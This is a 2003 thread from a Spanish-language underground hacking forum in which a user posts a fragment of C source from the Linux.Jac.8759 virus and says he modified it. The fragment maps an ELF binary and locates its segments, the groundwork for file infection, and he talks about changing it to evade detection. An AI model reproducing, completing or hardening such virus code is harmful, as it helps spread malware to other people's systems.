Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 18, 2008, 10:58:39
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Hack Novato  |  Troyanos y virus (Moderador: Angelus_7722)  |  Tema: Linux.Jac.8759 virus (y esta vez no lo borren) 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Linux.Jac.8759 virus (y esta vez no lo borren)  (Leído 198 veces)
codelogman
Visitante
« en: ſeptiembre 04, 2003, 01:13:55 »

En línea
athe
Visitante


Email
« Respuesta #1 en: ſeptiembre 04, 2003, 01:34:17 »

tu lo codeaste?

-- flux
En línea
codelogman
Visitante
« Respuesta #2 en: ſeptiembre 04, 2003, 02:27:23 »

no, le hice unas midificaciones :

fd = open (binary, O_RDONLY);
  if (fd < 0)
die ("%s: open failed:", binary);

  mmapf = mmap (NULL, filestats.st_size, PROT_READ
| PROT_WRITE, MAP_PRIVATE, fd, 0);
  if (mmapf == MAP_FAILED)
die ("%s: mmap failed:", binary);
  close (fd);

  n = elf_check (binary, ehdr = (Elf32_Ehdr *) mmapf);
  if (n < 0) {
printf ("exiting ...\n");
exit (EXIT_SUCCESS);
  }

  phdr = (Elf32_Phdr *) (mmapf + ehdr->e_phoff);
  shdr = (Elf32_Shdr *) (mmapf + ehdr->e_shoff);

  text = locate_segment (PT_LOAD, PF_R | PF_X);
  data = locate_segment (PT_LOAD, PF_R | PF_W);
  dyn = locate_segment (PT_DYNAMIC, PF_R | PF_W);

  if (text == NULL)
die ("couldn't find text segment!?\n");
  if (data == NULL)
die ("couldn't find data segment!?\n");
  if (dyn == NULL)
die ("couldn't find dyn segment!?\n");


esta seccion me parecio que se podia  optimizar, ya que el correr una peticion de archivo de esa forma se puede detectar en un linux BIEN configurado, puedes ver el codigo (este) en:  
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

hay mas curiosidades ahi....

nota: esta en chino (literalmente)

Az
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Hack Novato  |  Troyanos y virus (Moderador: Angelus_7722)  |  Tema: Linux.Jac.8759 virus (y esta vez no lo borren) « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC